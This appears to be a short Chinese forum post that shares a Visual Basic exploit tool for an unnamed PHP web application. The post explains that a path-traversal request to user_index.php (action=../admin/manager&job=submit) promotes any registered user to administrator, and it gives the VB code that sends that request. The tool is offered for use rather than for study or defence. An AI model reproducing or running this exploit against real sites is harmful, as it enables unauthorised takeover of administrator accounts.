玄猫发布的一个漏洞利用工具..后来经过抓包分析..发现其实不用修改管理员密码..直接就可以把注册的用户提升为管理员...接着用VB写了个程序.方便使用.
具体利用程序里有使用说明.
---------------------
程序主要代码为
Private Sub Command1_Click()
WebBrowser1.Navigate (url.Text "/user_index.php?action=../admin/manager&job=submit&username=" user.Text "&password=" pass.Text "&check_pwd=" pass.Text)
WebBrowser1.Visible = True
End Sub
Private Sub Command2_Click()
End
End Sub
Private Sub shuoming_Click()
Form2.Show
End Sub